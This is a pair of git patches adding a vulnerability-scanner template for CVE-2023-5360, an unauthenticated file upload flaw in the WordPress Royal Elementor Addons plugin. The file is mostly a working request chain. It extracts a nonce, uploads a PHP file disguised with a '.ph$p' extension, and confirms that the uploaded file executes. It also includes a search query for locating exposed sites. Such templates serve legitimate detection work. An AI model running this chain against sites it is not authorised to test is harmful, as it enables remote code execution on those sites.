From e3cad34cd3a1aa46e9798caf9020c584bebf32cc Mon Sep 17 00:00:00 2001 From: Aman Rawat <35992750+theamanrawat@users.noreply.github.com> Date: Tue, 17 Oct 2023 14:30:45 +0530 Subject: [PATCH 1/2] Create CVE-2023-5360.yaml --- http/cves/2023/CVE-2023-5360.yaml | 83 +++++++++++++++++++++++++++++++ 1 file changed, 83 insertions(+) create mode 100644 http/cves/2023/CVE-2023-5360.yaml diff --git a/http/cves/2023/CVE-2023-5360.yaml b/http/cves/2023/CVE-2023-5360.yaml new file mode 100644 index 0000000000..0699a2f207 --- /dev/null +++ b/http/cves/2023/CVE-2023-5360.yaml @@ -0,0 +1,83 @@ +id: CVE-2023-5360 + +info: + name: WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload + author: theamanrawat + severity: critical + description: | + Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79 + reference: + - https://wordpress.org/plugins/royal-elementor-addons/ + - https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-5360 + metadata: + verified: "true" + tags: cve,cve2023,rce,wpscan,wordpress,wp-plugin,wp,royal-elementor-addons,unauthenticated + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST /wp-admin/admin-ajax.php?action=wpr_addons_upload_file HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------318949277012917151102295043236 + + -----------------------------318949277012917151102295043236 + Content-Disposition: form-data; name="uploaded_file"; filename="{{randstr}}.ph$p" + Content-Type: image/png + + + -----------------------------318949277012917151102295043236 + Content-Disposition: form-data; name="allowed_file_types" + + ph$p + -----------------------------318949277012917151102295043236 + Content-Disposition: form-data; name="triggering_event" + + click + -----------------------------318949277012917151102295043236 + Content-Disposition: form-data; name="wpr_addons_nonce" + + {{nonce}} + -----------------------------318949277012917151102295043236-- + + - | + GET /wp-content/uploads/wpr-addons/forms/{{filename}}.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - "86398d3a90432d24901a7bbdcf1ab2ba" + condition: and + + - type: word + part: header_3 + words: + - "text/html" + + - type: status + status: + - 200 + + extractors: + - type: regex + name: nonce + part: body_1 + group: 1 + regex: + - 'WprConfig\s*=\s*{[^}]*"nonce"\s*:\s*"([^"]*)"' + internal: true + + - type: regex + name: filename + part: body_2 + group: 1 + regex: + - 'wp-content\\\/uploads\\\/wpr-addons\\\/forms\\\/(.*?).php' + internal: true From 22719a4c3ee574086cb32b495a296867dd5467ba Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 17 Oct 2023 17:28:54 +0530 Subject: [PATCH 2/2] minor update --- http/cves/2023/CVE-2023-5360.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-5360.yaml b/http/cves/2023/CVE-2023-5360.yaml index 0699a2f207..c45535e856 100644 --- a/http/cves/2023/CVE-2023-5360.yaml +++ b/http/cves/2023/CVE-2023-5360.yaml @@ -10,9 +10,15 @@ info: - https://wordpress.org/plugins/royal-elementor-addons/ - https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34/ - https://nvd.nist.gov/vuln/detail/CVE-2023-5360 + remediation: Fixed in 1.3.79 metadata: verified: "true" - tags: cve,cve2023,rce,wpscan,wordpress,wp-plugin,wp,royal-elementor-addons,unauthenticated + max-request: 3 + publicwww-query: "/plugins/royal-elementor-addons/" + tags: cve,cve2023,rce,wpscan,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive + +variables: + file: "{{to_lower(rand_text_alpha(5))}}" http: - raw: @@ -26,7 +32,7 @@ http: Content-Type: multipart/form-data; boundary=---------------------------318949277012917151102295043236 -----------------------------318949277012917151102295043236 - Content-Disposition: form-data; name="uploaded_file"; filename="{{randstr}}.ph$p" + Content-Disposition: form-data; name="uploaded_file"; filename="{{file}}.ph$p" Content-Type: image/png